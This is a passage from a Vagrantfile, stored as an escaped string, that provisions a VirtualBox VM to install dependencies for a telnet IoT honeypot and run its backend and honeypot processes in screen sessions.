\"192.168.33.10\"\n\n  # Create a public network, which generally matched to bridged network.\n  # Bridged networks make the machine appear as another physical device on\n  # your network.\n  # config.vm.network \"public_network\"\n\n  # Share an additional folder to the guest VM. The first argument is\n  # the path on the host to the actual folder. The second argument is\n  # the path on the guest to mount the folder. 
And the optional third\n  # argument is a set of non-required options.\n  config.vm.synced_folder \"../../\", \"/vagrant_data\"\n\n  # Provider-specific configuration so you can fine-tune various\n  # backing providers for Vagrant. These expose provider-specific options.\n  # Example for VirtualBox:\n  \n  config.vm.provider \"virtualbox\" do |vb|\n    # Display the VirtualBox GUI when booting the machine\n    vb.gui = false\n  \n    # Customize the amount of memory on the VM:\n    vb.memory   = \"768\"\n    # vb.cpus   = 2\n  end\n\n  # View the documentation for the provider you are using for more\n  # information on available options.\n\n  # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies\n  # such as FTP and Heroku are also available. See the documentation at\n  # https://docs.vagrantup.com/v2/push/atlas.html for more information.\n  # config.push.define \"atlas\" do |push|\n  #   push.app = \"YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME\"\n  # end\n\n  # Enable provisioning with a shell script. Additional provisioners such as\n  # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the\n  # documentation for more information about their specific syntax and use.\n  # Note: privileged takes a boolean; the string 'false' is truthy in Ruby\n  # and would silently run the script as root.\n  config.vm.provision \"shell\", privileged: false, inline: <<-SHELL\n    sudo apt-get update\n    sudo apt-get install -y python-pip sqlite3 screen\n    \n    cp -r /vagrant_data telnet-iot-honeypot\n    cd telnet-iot-honeypot\n    rm -f database.db\n    rm -f config.yaml\n\n    export LC_ALL=C\n    sudo pip install -r requirements.txt\n\n    sudo bash create_config.sh\n  SHELL\n\n  config.vm.provision \"shell\", privileged: false, run: 'always', inline: <<-SHELL\n    screen -dmS backend  bash -c \"cd telnet-iot-honeypot; python backend.py\"\n    sleep 5\n    screen -dmS honeypot bash -c \"cd telnet-iot-honeypot; python honeypot.py\"\n    screen -list\n  SHELL\nend\n"
  }
]